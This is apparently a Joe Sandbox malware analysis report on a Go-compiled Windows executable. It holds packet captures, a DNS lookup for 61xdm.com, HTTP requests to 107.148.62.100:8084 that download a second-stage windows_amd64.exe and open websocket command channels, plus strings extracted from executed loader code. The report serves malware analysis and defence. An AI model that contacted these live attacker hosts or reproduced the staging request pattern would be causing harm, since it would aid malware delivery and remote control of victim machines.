Dec 18, 2024 13:32:09.938460112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.938510895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.948143005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.948431969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.948496103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.948898077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.949243069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.949286938 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.949949026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.950284004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.950333118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.952755928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.953063965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.953116894 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.953721046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.955393076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.955446005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.955707073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.956289053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.956335068 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.958456993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.958657980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.958964109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.959032059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.961185932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.961236000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.961427927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.961977005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.962018967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.963330030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.963843107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.963886976 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.964178085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.964638948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.964683056 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.964970112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.965712070 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.965770006 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.968061924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.968436956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.968482018 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.968961954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.970395088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.970438957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.970520020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.970652103 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.970693111 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.971343994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.975899935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.975953102 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:09.976078033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.976557970 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:09.976600885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.056979895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.057262897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.057315111 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.057836056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.058332920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.058381081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.058610916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.059298992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.059345007 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.061281919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.061609030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.061655998 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.062113047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.064522028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.064570904 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.064806938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.065176964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.065223932 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.069585085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.069901943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.069951057 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.070471048 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.082587004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.082638025 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.082818985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.083648920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.083694935 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.148194075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.148761034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.148827076 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.149084091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.149651051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.149693966 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.150474072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.150723934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.150774002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.151690006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.151953936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.152002096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.152612925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.162431955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.162507057 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.162724018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.163265944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.163341999 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.163502932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.163953066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.164011955 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.164437056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.166058064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.166105986 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.166224003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.166240931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.166289091 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.166846991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.169493914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.169574022 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.169743061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.170973063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.171025991 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.172211885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.172615051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.172656059 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.172950983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.176379919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.176445961 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.176803112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.177195072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.177253008 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.178281069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.178595066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.178642035 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.178896904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.179409981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.179455996 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.179658890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.179814100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.179864883 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.180229902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.182003975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.182063103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.182528019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.183136940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.183182001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.184218884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.184658051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.184705019 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.185040951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.190000057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.190048933 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.190084934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.190618992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.190661907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.274620056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.274655104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.274701118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.275166035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.275177956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:10.275230885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:10.276179075 CET	8084	49705	107.148.62.100	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 13:31:50.797933102 CET	192.168.2.5	1.1.1.1	0xc76f	Standard query (0)	www.61xdm.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 13:31:51.029041052 CET	1.1.1.1	192.168.2.5	0xc76f	No error (0)	www.61xdm.com	61xdm.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 13:31:51.029041052 CET	1.1.1.1	192.168.2.5	0xc76f	No error (0)	61xdm.com		107.148.51.200	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	107.148.62.100	8084	1096	C:\Users\user\Desktop\O16AWEA5iQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:31:53.769289970 CET	1024	OUT	GET /?a=w64&h=107.148.62.100&t=ws_&p=8084 HTTP/1.1 Host: 107.148.62.100:8084 Data Raw: 00 00 00 00 00 00 00 26 9a 86 c8 f8 7f 00 00 00 00 0d 00 f7 7f 00 00 02 00 00 00 f8 7f 00 00 00 00 00 00 00 00 00 00 af f2 fe c5 f8 7f 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 45 45 8a c8 f8 7f 00 00 00 80 97 ed fb 00 00 00 02 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 30 33 4d 00 f7 7f 00 00 80 26 80 d2 eb 02 00 00 ff 9a 86 c8 f8 7f 00 00 48 a0 8a 00 f7 7f 00 00 00 00 0d 00 f7 7f 00 00 02 00 00 00 f8 7f 00 00 80 26 80 d2 eb 02 00 00 00 00 00 00 00 00 00 00 85 03 fe 7f 00 00 00 00 15 00 00 00 00 00 00 00 d3 e6 88 c8 f8 7f 00 00 00 12 67 c5 f8 7f 00 00 b4 d9 8a c8 f8 7f 00 00 00 00 00 00 00 00 00 00 00 50 96 ed fb 00 00 00 00 00 00 00 00 00 00 00 6f df 87 c8 f8 7f 00 00 00 12 67 c5 f8 7f 00 00 55 79 86 c8 f8 7f 00 00 00 00 80 d2 eb 02 00 00 a8 94 82 d2 eb 02 00 00 00 50 96 ed fb 00 00 00 00 12 67 c5 f8 7f 00 00 00 4f 82 d2 eb 02 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 94 82 d2 eb 02 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 a0 94 82 [TRUNCATED] Data Ascii: &EE 03M&H&gPogUyPgOKRPy=y:Z(PK(RR}xhKRR}x0:M0dCD +PSS[&
Dec 18, 2024 13:31:55.280118942 CET	1213	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Content-Type: application/x-download;charset=utf-8 Content-Disposition:attachment; filename=windows_amd64.exe Content-Length: 19969280 Data Raw: d4 c3 dc cb 71 99 99 99 99 c0 d1 1a 70 90 d1 12 58 d1 9c 99 29 a9 98 66 49 5a 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 19 99 99 99 97 86 23 97 99 2d 90 54 b8 21 98 d5 54 b8 cd f1 f0 ea b9 e9 eb f6 fe eb f8 f4 b9 fa f8 f7 f7 f6 ed b9 fb fc b9 eb ec f7 b9 f0 f7 b9 dd d6 ca b9 f4 f6 fd fc b7 94 94 93 bd 99 99 99 99 99 99 99 c9 dc 99 99 fd 1f 9f 99 99 99 99 99 99 e7 b0 98 99 99 99 99 69 99 bb 9b 92 9b 9a 99 99 83 30 99 99 43 9c 99 99 99 99 99 79 ab 9f 99 99 89 99 99 99 99 d9 99 99 99 99 99 99 89 99 99 99 89 99 99 9f 99 98 99 98 99 99 99 9f 99 98 99 99 99 99 99 99 29 a9 98 99 9f 99 99 99 99 99 99 9b 99 f9 18 99 99 b9 99 99 99 99 99 99 89 99 99 99 99 99 99 99 99 89 99 99 99 99 99 99 89 99 99 99 99 99 99 99 99 99 99 89 99 99 99 99 99 99 99 99 99 99 99 99 59 b4 98 55 9d 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 49 b4 98 2b 59 9b 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 [TRUNCATED] Data Ascii: qpX)fIZ#-T!Ti0Cy)YUI+Yi00Y0Y0IiIiYYYYIIII99 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49911	107.148.62.100	8084	1096	C:\Users\user\Desktop\O16AWEA5iQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:33:32.877314091 CET	158	OUT	GET / HTTP/1.1 Host: 107.148.62.100:8084 Upgrade: websocket Connection: Upgrade Sec-WebSocket-Version: 13 Sec-WebSocket-Key: T8vpWyVC/nn0nHpR3Si6Ig==
Dec 18, 2024 13:33:34.400863886 CET	129	IN	HTTP/1.1 101 Switching Protocols Upgrade: websocket Connection: Upgrade Sec-WebSocket-Accept: ezpFF4HkakOSqObXQ/vWrmKADB4=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49922	107.148.62.100	8084	1096	C:\Users\user\Desktop\O16AWEA5iQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:33:37.533788919 CET	158	OUT	GET / HTTP/1.1 Host: 107.148.62.100:8084 Upgrade: websocket Connection: Upgrade Sec-WebSocket-Version: 13 Sec-WebSocket-Key: U17qSsg+npRZjK2b4g0Mgg==
Dec 18, 2024 13:33:39.013004065 CET	129	IN	HTTP/1.1 101 Switching Protocols Upgrade: websocket Connection: Upgrade Sec-WebSocket-Accept: SzM/VQpdf05JynGOhL8Azef211o=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49930	107.148.62.100	8084	1096	C:\Users\user\Desktop\O16AWEA5iQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:33:40.511554956 CET	158	OUT	GET / HTTP/1.1 Host: 107.148.62.100:8084 Upgrade: websocket Connection: Upgrade Sec-WebSocket-Version: 13 Sec-WebSocket-Key: QNQljnb+r4w3/s2WDeO8GA==
Dec 18, 2024 13:33:42.019460917 CET	129	IN	HTTP/1.1 101 Switching Protocols Upgrade: websocket Connection: Upgrade Sec-WebSocket-Accept: dIU87Zc6uag656F5g3jwZsNUG3I=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	107.148.51.200	443	1096	C:\Users\user\Desktop\O16AWEA5iQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:31:52 UTC	98	OUT	GET /wmob HTTP/1.1 Host: www.61xdm.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-12-18 12:31:53 UTC	455	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 12:31:50 GMT Content-Type: application/octet-stream Content-Length: 1669 Last-Modified: Mon, 16 Dec 2024 20:46:01 GMT Connection: close ETag: "67609189-685" Strict-Transport-Security: max-age=31536000 Alt-Svc: quic=":443"; h3=":443"; h3-29=":443"; h3-27=":443";h3-25=":443"; h3-T050=":443"; h3-Q050=":443";h3-Q049=":443";h3-Q048=":443"; h3-Q046=":443"; h3-Q043=":443" Accept-Ranges: bytes
2024-12-18 12:31:53 UTC	1669	IN	Data Raw: e8 46 06 00 00 eb 05 dd 58 74 f8 ed 95 ba d9 89 cf d3 76 2e b2 b1 4b c4 5a e1 57 6a 00 45 30 04 09 45 02 04 09 e2 f6 66 8f 8c 8c 8c 0c 38 e4 a8 c6 13 bc c4 13 aa fc 3d 66 87 d1 6e b9 e9 14 b0 44 0c 06 05 fa b0 a9 b5 ed e1 e1 91 90 12 19 3f b8 8c 62 66 66 00 cb aa 6d 88 ae 1b 66 e3 01 35 3e e6 96 dc 5d 3f 67 d0 1d 39 fc 01 99 4a 64 82 e6 7e 31 74 44 d0 42 39 ea 98 85 08 de 91 04 02 71 e2 2e 6d 20 95 75 26 c8 e6 7a 92 55 d0 d8 24 48 08 7e e3 ed ec bf e7 50 dd 99 5c d9 d9 32 bd 0b 66 19 9c 9c 0e 62 8c e4 7c 33 76 66 f2 1e 5e 24 55 a7 56 75 8a a3 d3 b8 38 2e 4b 4f 4f 2f 46 92 61 3e de 80 eb a3 ab d3 d7 d7 a7 1c 45 18 6a 8b b3 b8 b0 96 f5 f1 f1 81 b4 60 6b ab e4 aa c1 a1 a5 eb ef ef 8f 86 9e b4 e7 f2 b8 a9 ec 0c d4 9c 98 98 66 df dd f4 82 dd 8d f6 de c0 f3 f7 Data Ascii: FXtv.KZWjE0Ef8=fnD?bffmf5>]?g9Jd~1tDB9q.m u&zU$H~P\2fb\|3vf^$UVu8.KOO/Fa>Ej`kf

Target ID:	0
Start time:	07:31:49
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\O16AWEA5iQ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\O16AWEA5iQ.exe"
Imagebase:	0x7ff7000d0000
File size:	22'996'756 bytes
MD5 hash:	54A911B3E8161444EA6677C23AA38D17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50%
Total number of Nodes:	28
Total number of Limit Nodes:	5

Executed Functions

Function 000002EBD2AD0000 Relevance: 70.5, APIs: 9, Strings: 31, Instructions: 459
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002EBD2AD0076

Strings

32.d, xrefs: 000002EBD2AD0069
user, xrefs: 000002EBD2AD0057
t: , xrefs: 000002EBD2AD0331
msvc, xrefs: 000002EBD2AD009A
ws2_, xrefs: 000002EBD2AD007C
Hos, xrefs: 000002EBD2AD032A
32.d, xrefs: 000002EBD2AD0083
.1, xrefs: 000002EBD2AD0323
w64, xrefs: 000002EBD2AD017D
%s%s, xrefs: 000002EBD2AD03B9
%s%s, xrefs: 000002EBD2AD03F6
%s%s, xrefs: 000002EBD2AD01E2
TP/1, xrefs: 000002EBD2AD031C
62.1, xrefs: 000002EBD2AD01A1
unMa, xrefs: 000002EBD2AD0100
%s&t, xrefs: 000002EBD2AD02FC
HT, xrefs: 000002EBD2AD0315
%s%s, xrefs: 000002EBD2AD01DA
=%s&, xrefs: 000002EBD2AD02EB
GET , xrefs: 000002EBD2AD02D6
148., xrefs: 000002EBD2AD0199
ws_, xrefs: 000002EBD2AD0187
107., xrefs: 000002EBD2AD0191
=%s&, xrefs: 000002EBD2AD0303
%s:%, xrefs: 000002EBD2AD0338
rt.d, xrefs: 000002EBD2AD00A1
/?a, xrefs: 000002EBD2AD02E4
d, xrefs: 000002EBD2AD033F
p=%d, xrefs: 000002EBD2AD030E
%s%s, xrefs: 000002EBD2AD03D4
%s%s, xrefs: 000002EBD2AD01D2

Memory Dump Source

Source File: 00000000.00000002.4571814955.000002EBD2AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000002EBD2AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebd2ad0000_O16AWEA5iQ.jbxd

Similarity

API ID: LibraryLoad
String ID: Hos$ HT$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s&t$%s:%$.1$/?a$107.$148.$32.d$32.d$62.1$=%s&$=%s&$GET $TP/1$d$msvc$p=%d$rt.d$t: $unMa$user$w64$ws2_$ws_
API String ID: 1029625771-3065570680
Opcode ID: a3d67f65d341df92c7b229f92aef91cd92f3bd6d03f8bad1ccdfadc7b8afeea8
Instruction ID: dc9c03a83cfd9bf33fbcc4fc3f6f52816bd54448107d86d969f3e750d70fb691
Opcode Fuzzy Hash: a3d67f65d341df92c7b229f92aef91cd92f3bd6d03f8bad1ccdfadc7b8afeea8
Instruction Fuzzy Hash: 9EF17F719087CC8BDB2ADF64DC856EEBBA0FB64304F50455DD88AC7251EB34D646CB82

Function 000002EBD2AD0008 Relevance: 66.9, APIs: 7, Strings: 31, Instructions: 390
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002EBD2AD0076

Strings

32.d, xrefs: 000002EBD2AD0069
user, xrefs: 000002EBD2AD0057
t: , xrefs: 000002EBD2AD0331
msvc, xrefs: 000002EBD2AD009A
ws2_, xrefs: 000002EBD2AD007C
Hos, xrefs: 000002EBD2AD032A
32.d, xrefs: 000002EBD2AD0083
.1, xrefs: 000002EBD2AD0323
w64, xrefs: 000002EBD2AD017D
%s%s, xrefs: 000002EBD2AD03B9
%s%s, xrefs: 000002EBD2AD03F6
%s%s, xrefs: 000002EBD2AD01E2
TP/1, xrefs: 000002EBD2AD031C
62.1, xrefs: 000002EBD2AD01A1
unMa, xrefs: 000002EBD2AD0100
%s&t, xrefs: 000002EBD2AD02FC
HT, xrefs: 000002EBD2AD0315
%s%s, xrefs: 000002EBD2AD01DA
=%s&, xrefs: 000002EBD2AD02EB
GET , xrefs: 000002EBD2AD02D6
148., xrefs: 000002EBD2AD0199
ws_, xrefs: 000002EBD2AD0187
107., xrefs: 000002EBD2AD0191
=%s&, xrefs: 000002EBD2AD0303
%s:%, xrefs: 000002EBD2AD0338
rt.d, xrefs: 000002EBD2AD00A1
/?a, xrefs: 000002EBD2AD02E4
d, xrefs: 000002EBD2AD033F
p=%d, xrefs: 000002EBD2AD030E
%s%s, xrefs: 000002EBD2AD03D4
%s%s, xrefs: 000002EBD2AD01D2

Memory Dump Source

Source File: 00000000.00000002.4571814955.000002EBD2AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000002EBD2AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebd2ad0000_O16AWEA5iQ.jbxd

Similarity

API ID: LibraryLoad
String ID: Hos$ HT$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s&t$%s:%$.1$/?a$107.$148.$32.d$32.d$62.1$=%s&$=%s&$GET $TP/1$d$msvc$p=%d$rt.d$t: $unMa$user$w64$ws2_$ws_
API String ID: 1029625771-3065570680
Opcode ID: 8611c643db6afe545d0f7574d47fd8609b9992697eb9ec212d135069bb20b08d
Instruction ID: 8d8062c0e6254dc85c8f6d470c233e381228370085575310b84c751e20741c98
Opcode Fuzzy Hash: 8611c643db6afe545d0f7574d47fd8609b9992697eb9ec212d135069bb20b08d
Instruction Fuzzy Hash: 02E18F718087CC8BDB26DF64D895AEEBBB0FF64304F50455DD88A8B251EB34D645CB82

Non-executed Functions

Function 000002EBF9B9C880 Relevance: 8.0, Strings: 6, Instructions: 510COMMON

Download Yara Rule

Strings

malloc deadlockmisaligned maskmissing mcache?preempt SPWRITEprofile cleanuprecovery failedruntime error: runtimer: bad pscan missed a gstartm: m has pstopm holding psync.Mutex.Locktraceback stuck, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitG, xrefs: 000002EBF9B9D085
mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: unable to acquire - semaphore out of syncfatal: systemstack called from unexpected goroutinelimiterEvent.stop: invalid limiter event type foundpotentia, xrefs: 000002EBF9B9D096
malloc during signalnotetsleep not on g0p mcache not flushedreflect.makeFuncStubruntime: double waitselectgo: bad wakeupsemaRoot rotateRighttrace: out of memorywirep: already in goworkbuf is not emptyws2_32.dll not foundasync stack too largecheckdead: runnable, xrefs: 000002EBF9B9D070
